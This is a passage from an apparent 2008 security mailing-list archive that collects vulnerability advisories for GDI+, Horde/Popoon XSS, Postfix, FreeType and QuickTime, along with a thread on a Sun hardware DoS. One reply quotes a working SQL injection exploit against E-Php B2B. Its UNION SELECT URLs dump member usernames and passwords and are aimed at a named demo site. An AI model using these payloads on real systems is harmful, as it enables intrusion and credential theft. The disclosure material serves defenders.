potentially execute arbitrary code.

###
#The vulnerability#
###

The vulnerability is caused due to improper handling of graphic
control extension when processing malformed GIF files. The
vulnerability can be triggered if a large number of extension markers
(0x21) followed by unknown labels is found when processing a GIF file.


#Impact#


This vulnerability can be used to corrupt memory of any application
utilizing GDI+ for GIF file decoding if it is used to open a malformed
GIF file. This could lead to code execution with the privileges of the
user running the vulnerable application.


#References#


http://ifsec.blogspot.com/2008/09/windows-gdi-gif-memory-corruption.html
http://www.zerodayinitiative.com/advisories/ZDI-08-056/
http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3013

[oCERT-2008-012] Horde, Popoon frameworks common input sanitization errors (XSS)

[Will Drewry]

#2008-012 Horde, Popoon frameworks common input sanitization errors (XSS)

Two cross-site scripting (XSS) vulnerabilities were reported in Horde
Framework. The first of which is that the Horde framework fails to properly
sanitize the filename of MIME attachments on received emails.  The second
vulnerability has a wider impact.

Horde relies on code similar to Popoon's externalinput.php to filter out
potential XSS attacks on user-supplied input.  This filter, and the original,
fail to fully sanitize user data.  In particular, this filter fails to
protect against '/'s acting as spaces in both Microsoft Internet Explorer and
Mozilla Firefox.

Patches have been made available for Horde:

* 3.1:
  http://ocert.org/patches/2008-012/Text_Filter.31.patch
* 3.2 - CVS HEAD:
  http://ocert.org/patches/2008-012/MIME.patch
  http://ocert.org/patches/2008-012/Text_Filter.patch

A replacement for externalinput.php is linked below as well.


Affected version:

Popoon (externalinput.php) <= r22196

Horde >= 3.2, <= 3.2.1 (both issues)
Horde >= 3.1, <  3.2   (XSS filter only)

(secondary affected versions)

Horde Groupware >= 1.0, <= 1.0.6 (XSS filter only)
Horde Groupware Webmail Edition >= 1.0, <= 1.0.7 (XSS filter only)
Horde Groupware >= 1.1, <= 1.1.2 (both issues)
Horde Groupware Webmail Edition >= 1.1, <= 1.1.2 (both issues)
Cake-PHP <= 1.2.0.7296 RC2
phpMyFAQ <= 2.5.0-dev (2008-08-18)
deluxeBB <= 1.2
emucms <= 0.3
SimpleSite <= 1.6.4
RevokeBB <= 1.0RC11_normal
TPLN <= 2.9
Logicoder <= r27
phour <= r106
MDPro <= 1.0821
noserub <= r784/0.6


Fixed version:

Horde > 3.2.1 (see patches)

externalinput/clean.php (see links)


Credit: Vulnerability report and proof of concepts received from
Alexios Fakos .


CVE: CVE-2008-3823 (MIME attachment), CVE-2008-3824 (XSS filtering)


Timeline:
2008-08-05: initial report and proof of concepts received.
2008-08-18: affected software survey completed by oCERT.
2008-08-18: externalinput.php/Popoon author contacted.
2008-08-19: Horde author contacted.
2008-08-19: initial patches for Horde and Popoon supplied by vendors.
2008-08-19: reporter calls out additional possible vectors in externalinput.php.
2008-08-20: secondary fixed for externalinput.php supplied.
2008-08-20: attempted to contact CakePHP.
2008-09-04: final Horde patches supplied.
2008-09-04: potentially affected oCERT members and vendor-sec notified.
2008-08-05: CVEs assigned.
2008-09-05: oCERT requests end of embargo to be Sep 10, 1700 UTC.
2008-09-06: contacted phlymail lite; confirmed unaffected.
2008-09-06: notified all secondary vendors above.
2008-09-06: acknowledgement from cakephp, noserub, phpmyfaq.
2008-09-09: confirmed exact embargo end with vendor-sec and other vendors.
2008-09-10: advisory released.

References:
http://blog.liip.ch/archive/2005/01/16/xss-how-we-try-to-prevent-it.html
http://blog.liip.ch/missed-case-in-externalinput-php-resulting-in-viable-xss-attacks.html

Links:
http://horde.org
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
https://svn.liip.ch/repos/public/ext/externalinput/trunk/lx/externalinput/clean.php
http://horde.org/groupware
http://www.cakephp.org
http://www.phpmyfaq.de
http://www.deluxebb.com
http://www.emusoft.org/index.php?page=category&cat_id=14
http://dev.mistralys.com/SimpleSite
http://sourceforge.net/projects/revokebb
http://tpln.h2lsoft.com/
http://code.google.com/p/logicoder/
http://code.google.com/p/phour/
http://www.maxdev.com/AboutMD.phtml
http://code.google.com/p/noserub/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3823
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3824

Permalink:
http://www.ocert.org.org/advisories/ocert-2008-012.html


--
Will Drewry <[EMAIL PROTECTED]>
oCERT Team :: http://ocert.org

Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability

[packet]

Already discovered:

http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt 
cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers 
from a remote SQL injection vulnerability in listings.php.  Homepage: http://www.darkc0de.com/"; target="ext">http://www.darkc0de.com/.  
Authored By mailto:r45c4l[at]hotmail.com";>r45c4l

On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote:
> |___|
> |
> | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
> |
> |___
> |-Hussin X--|
> |
> |Author: Hussin X
> |
> |Home :  WwW.Hussin-X.CoM   |  www.tryag.cc/cc
> |
> |email:  darkangel_g85[at]Yahoo[DoT]com
> |
> |
> |
> |___
> |   |
> |
> | script : http://www.ephpscripts.com
> |
> |___|
> 
> Exploit:
> 
> 
> 
> www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> L!VE DEMO: :
> 
> INFO
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> ( Greetz )_
> |
> |All members of the Forum  WwW.Hussin-X.CoM  |
> WwW.TrYaG.CC 
> |
> | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
> |
> |  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
> |__
> 
> 
>  Im IRAQi

> |___|
> |
> | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
> |
> |___
> |-Hussin X--|
> |
> |Author: Hussin X
> |
> |Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
> |
> |email:  darkangel_g85[at]Yahoo[DoT]com
> |
> |
> |
> |___
> |   |
> |
> | script : http://www.ephpscripts.com
> |
> |___|
> 
> Exploit:  
> 
> 
> 
> www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members--
> 
> 
> 
> 
> 
> 
> 
> L!VE DEMO: :
> 
> INFO
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members--
> 
> 
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members--
> 
> 
> 
> 
> 
> 
> 
> ( Greetz )_
> |
> |All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
> |
> | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr 
> |   
> |  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
> |__
> 
> 
>  Im IRAQi

Re: Sun M-class hardware denial of service

[Florian Weimer]

* Theo de Raadt:

> That is WRONG.  The long-term uptime of all other domains on the
> machine are eventually impacted because the entire physical machine
> must, after a service call to Sun, eventually be powered down.
>
> Management eventually has to decide to impact the SLA's of all domains.
> That means that Sun's promise of isolation is bunk.

The recovery strategy leaves something to be desired, true.  It's
certainly a bug.  I doubt it makes a difference whether it's labeled as
a security bug or not.

I don't want to downplay your frustration, but the pattern is fairly
common: When someone tries to port a new operating system to some
partitioning system, it's not totally unheard of that the new code takes
down (parts of) the sytem beyond the assigned partition.

> How absolutely bizzare.  Basically you spend half a million dollars on
> Sun hardware, and it isn't required to do this better than VMWare?

I think you've got it exactly backwards: you don't let non-trusted
people run code on these machines because they are so expensive.

> If an OS running inside VMWare was able to cause a situation making it
> neccessary to reboot the host environment and restart all VMWare
> instances, it would be considered a very serious and significant
> security problem for VMWare.

Are you sure about this?  Separation of virtual machines as if they were
real machines is not listed in the data sheet, and is not covered in the
security-related part of their website, either.

I'm sure they will fix bugs within their responsiblity, but as a
software vendor, they can only do so much about certain types of crasher
bugs.  I may have missed some promises, but I doubt they make any hard
guarantees (like money-back if lack of separation is demonstrated).

[ MDVSA-2008:190 ] postfix

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:190
 http://www.mandriva.com/security/
 ___

 Package : postfix
 Date: September 10, 2008
 Affected: 2008.0, 2008.1
 ___

 Problem Description:

 A vulnerability in Postfix 2.4 and later was discovered, when
 running on Linux kernel 2.6, where a local user could cause a denial
 of service due to Postfix leaking the epoll file descriptor when
 executing non-Postfix commands (CVE-2008-3889).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3889
 http://www.postfix.org/announcements/20080902.html
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 c0bf5d528d5d41dcd2d20ebdb34d0cda  
2008.0/i586/libpostfix1-2.4.5-2.2mdv2008.0.i586.rpm
 fa944c0d7f0cbea926f535d510bf55d1  
2008.0/i586/postfix-2.4.5-2.2mdv2008.0.i586.rpm
 198798461aa8d36de69167dabf12e753  
2008.0/i586/postfix-ldap-2.4.5-2.2mdv2008.0.i586.rpm
 58655741a221fa54a33566568f3b4b82  
2008.0/i586/postfix-mysql-2.4.5-2.2mdv2008.0.i586.rpm
 a38a78d39fe49cfa5dd71ee4f5a8a2bd  
2008.0/i586/postfix-pcre-2.4.5-2.2mdv2008.0.i586.rpm
 6d26bd16aaab2333dc84a86b0595b31d  
2008.0/i586/postfix-pgsql-2.4.5-2.2mdv2008.0.i586.rpm 
 da3f4b0d105461a2c0cc9d0ffdb8afbc  
2008.0/SRPMS/postfix-2.4.5-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 028de47e6f9dd2a18be1afbfbfcc7b35  
2008.0/x86_64/lib64postfix1-2.4.5-2.2mdv2008.0.x86_64.rpm
 4e790bb1f1cb14e0eb008e8188c7d7f3  
2008.0/x86_64/postfix-2.4.5-2.2mdv2008.0.x86_64.rpm
 a843dc0ab9e22c27f1a83d3dd01139fd  
2008.0/x86_64/postfix-ldap-2.4.5-2.2mdv2008.0.x86_64.rpm
 9e50dfda594b6e6c270d001f5c020086  
2008.0/x86_64/postfix-mysql-2.4.5-2.2mdv2008.0.x86_64.rpm
 b27f29aa607246fa343244e783080dce  
2008.0/x86_64/postfix-pcre-2.4.5-2.2mdv2008.0.x86_64.rpm
 90992c9e66cbfa61adcc8f25af56bad0  
2008.0/x86_64/postfix-pgsql-2.4.5-2.2mdv2008.0.x86_64.rpm 
 da3f4b0d105461a2c0cc9d0ffdb8afbc  
2008.0/SRPMS/postfix-2.4.5-2.2mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 f7e093f905a77051dd1f1719e70c  
2008.1/i586/libpostfix1-2.5.1-2.2mdv2008.1.i586.rpm
 17806bd3791473f79636f6e96aac3b16  
2008.1/i586/postfix-2.5.1-2.2mdv2008.1.i586.rpm
 ccbd6e6f134329f298da2e73ee924624  
2008.1/i586/postfix-ldap-2.5.1-2.2mdv2008.1.i586.rpm
 5e7501b1c226168794559a0c945c51ce  
2008.1/i586/postfix-mysql-2.5.1-2.2mdv2008.1.i586.rpm
 44482a44ec46d379cc90ec71b8d3da40  
2008.1/i586/postfix-pcre-2.5.1-2.2mdv2008.1.i586.rpm
 ed1ddf0451d015b1c85d09d438406c04  
2008.1/i586/postfix-pgsql-2.5.1-2.2mdv2008.1.i586.rpm 
 d450d39e8073c6c9f1c9003f6189cf1a  
2008.1/SRPMS/postfix-2.5.1-2.2mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 f9a52469d5700428f6a2c606d2846299  
2008.1/x86_64/lib64postfix1-2.5.1-2.2mdv2008.1.x86_64.rpm
 5cb84c0ebe53a446efd208da355a9b4b  
2008.1/x86_64/postfix-2.5.1-2.2mdv2008.1.x86_64.rpm
 cdc066f4ebcd87b1902d330129ff5a87  
2008.1/x86_64/postfix-ldap-2.5.1-2.2mdv2008.1.x86_64.rpm
 4067143e300d124b20d7a24972c4ae22  
2008.1/x86_64/postfix-mysql-2.5.1-2.2mdv2008.1.x86_64.rpm
 65a6a8c5206d7a9c45b12557896cba58  
2008.1/x86_64/postfix-pcre-2.5.1-2.2mdv2008.1.x86_64.rpm
 b8d9b415787c02698fa29772942a2300  
2008.1/x86_64/postfix-pgsql-2.5.1-2.2mdv2008.1.x86_64.rpm 
 d450d39e8073c6c9f1c9003f6189cf1a  
2008.1/SRPMS/postfix-2.5.1-2.2mdv2008.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIx+rLmqjQ0CJFipgRAuAOAJ9aBgcJBhECmuKoZUNfwNNc1jIuCwCfXO2S
zOSgJcz1VDJM8xHCoK3WQPM=
=Gg7G
-END PGP SIGNATURE-

[SECURITY] [DSA 1635-1] New freetype packages fix multiple vulnerabilities

[Steve Kemp]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1635-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
September 10, 2008   http://www.debian.org/security/faq
- 

Package: freetype
Vulnerability  : multiple
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-1806 CVE-2008-1807 CVE-2008-1808

Several local vulnerabilities have been discovered in freetype,
a FreeType 2 font engine, which could allow the execution of arbitrary
code.

The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2008-1806
An integer overflow allows context-dependent attackers to execute
arbitrary code via a crafted set of values within the Private
dictionary table in a Printer Font Binary (PFB) file.

CVE-2008-1807
The handling of an invalid "number of axes" field in the PFB file could
trigger the freeing of aribtrary memory locations, leading to 
memory corruption.

CVE-2008-1808
Multiple off-by-one errors allowed the execution of arbitrary code
via malformed tables in PFB files, or invalid SHC instructions in
TTF files.


For the stable distribution (etch), these problems have been fixed in version
2.2.1-5+etch3.

For the unstable distribution (sid), these problems have been fixed in
version 2.3.6-1.

We recommend that you upgrade your freetype package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.2.1-5+etch3.diff.gz
Size/MD5 checksum:33815 16f3a9f45c8ba0743fcce4db637b11bf
  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.2.1-5+etch3.dsc
Size/MD5 checksum:  806 5a9af398d4749d9b1da47b6d9dbab821

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch3_alpha.deb
Size/MD5 checksum:   169018 c99046707c48ee95504b3584e3acaffa
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch3_alpha.deb
Size/MD5 checksum:   733276 3db91ded5b0de609d968ab8e53920289
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch3_alpha.deb
Size/MD5 checksum:   386320 bf7f4273b546ef4826416b2b33e4f94a
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch3_alpha.udeb
Size/MD5 checksum:   279290 57b6163945dcedbc6269f4a9779c0fd1

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch3_amd64.deb
Size/MD5 checksum:   673858 0501dce4dff1621ecee0e2ce3eaef4aa
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch3_amd64.udeb
Size/MD5 checksum:   248168 9b5d402a5937e847a5e950384421d86c
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch3_amd64.deb
Size/MD5 checksum:   151546 2a6ff47137700ff8730440ccd7f7d151
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch3_amd64.deb
Size/MD5 checksum:   355500 87b2fb3932e86863c46c74916c1a5dde

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.2.1-5+etch3_arm.deb
Size/MD5 checksum:   646720 cd1705ecfef442f90d80e1fb83db292c
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch3_arm.deb
Size/MD5 checksum:   333838 060a4e7f6977045c5d7f35a721edc041
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch3_arm.deb
Size/MD5 checksum:   134028 e6dcac8b5abd633c83547bd34515dd82
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch3_arm.udeb
Size/MD5 checksum:   227294 41c45c91535b5325ae06649a1e4a3b1c

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.2.1-5+etch3_hppa.deb
Size/MD5 checksum:   369068 3bcfc3bbe665b9aae3b3933b25a04661
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.2.1-5+etch3_hppa.udeb
Size/MD5 checksum:   260548 5cc41d234eea28201f11485b610fb046
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.2.1-5+etch3_hppa.deb
Size/MD5 checksum:   151538 

Re: Sun M-class hardware denial of service

[terry white]

... ciao:

:  on "9-9-2008" "B 650" writ:
: I think it's a bit of a leap to call this a DoS vulnerability.
: The power cycle of the remainder of the frame can be done at your leisure

which, convenient if nothing else, still has to be done.  so, at some
point, "all" 'mission critical applications', are forced to fail.  'when'
a "DOS" happens, does not change its essential nature ...

-- 
... i'm a man, but i can change,
if i have to , i guess ...

ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow Vulnerability

[zdi-disclosures]

ZDI-08-057: Apple QuickTime IV32 Codec Parsing Stack Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-057
September 9, 2008

-- CVE ID:
CVE-2008-3635

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the parsing of QuickTime files that
utilize the Indeo video codec. A lack of proper bounds checking within
QuickTimeInternetExtras.qtx can result in a stack based buffer overflow
leading to arbitrary code execution under the context of the currently
logged in user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT3027

-- Disclosure Timeline:
2008-08-19 - Vulnerability reported to vendor
2008-09-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]